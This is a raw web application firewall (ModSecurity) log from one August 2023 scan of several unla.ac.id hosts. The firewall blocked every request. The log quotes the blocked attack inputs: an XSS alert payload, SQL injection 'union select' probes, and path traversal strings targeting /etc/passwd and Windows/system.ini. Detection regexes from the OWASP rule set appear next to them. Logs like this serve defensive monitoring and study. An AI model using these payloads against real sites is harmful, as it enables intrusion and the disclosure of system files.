[Tue Aug 29 11:48:38.405664 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAlUleMAAAA0"]
[Tue Aug 29 11:48:38.405761 2023] [:error] [pid 2383] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAlPmtoAAAAv"]
[Tue Aug 29 11:48:38.406198 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAkqHsUAAAAM"]
[Tue Aug 29 11:48:39.355230 2023] [:error] [pid 2379] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14p8Co-f0AAAlL7BgAAAAq"]
[Tue Aug 29 11:48:40.368468 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAjtdAgAAAAX"]
[Tue Aug 29 11:48:40.394696 2023] [:error] [pid 2414] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAluT0oAAAAe"]
[Tue Aug 29 11:48:40.410944 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAkyx94AAAAW"]
[Tue Aug 29 11:48:40.443528 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAkqHsoAAAAM"]
[Tue Aug 29 11:48:40.451835 2023] [:error] [pid 2382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAlOZIwAAAAu"]
[Tue Aug 29 11:48:41.435732 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qcCo-f0AAAj12IIAAAAa"]
[Tue Aug 29 11:48:43.363085 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAlUlfEAAAA0"]
[Tue Aug 29 11:48:43.367645 2023] [:error] [pid 2377] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAlJmbwAAAAo"]
[Tue Aug 29 11:48:43.393541 2023] [:error] [pid 2418] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAlyrAsAAAAI"]
[Tue Aug 29 11:48:43.400730 2023] [:error] [pid 2377] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAlJmb0AAAAo"]
[Tue Aug 29 11:48:43.405279 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAjtdBMAAAAX"]
[Tue Aug 29 11:48:43.405675 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAj12IgAAAAa"]
[Tue Aug 29 11:48:43.424996 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAkAMJ0AAAAU"]
[Tue Aug 29 11:48:43.428254 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAjtdBQAAAAX"]
[Tue Aug 29 11:48:43.432990 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAlUlfMAAAA0"]
[Tue Aug 29 11:48:43.440595 2023] [:error] [pid 2353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAkxFycAAAAV"]
[Tue Aug 29 11:48:44.425647 2023] [:error] [pid 2383] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14rMCo-f0AAAlPmuAAAAAv"]
[Tue Aug 29 11:48:44.617545 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14rMCo-f0AAAhujCQAAAAr"]
[Tue Aug 29 11:48:47.350955 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAhujCoAAAAr"]
[Tue Aug 29 11:48:47.352302 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAkwQSoAAAAS"]
[Tue Aug 29 11:48:47.353180 2023] [:error] [pid 2427] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAl74tEAAAAj"]
[Tue Aug 29 11:48:47.387865 2023] [:error] [pid 2428] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAl8pP4AAAAm"]
[Tue Aug 29 11:48:47.482817 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAkyx-AAAAAW"]
[Tue Aug 29 11:48:48.357104 2023] [:error] [pid 2427] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14sMCo-f0AAAl74tIAAAAj"]
[Tue Aug 29 11:48:49.368906 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAlIBZkAAAAn"]
[Tue Aug 29 11:48:49.371197 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAlo0zMAAAAJ"]
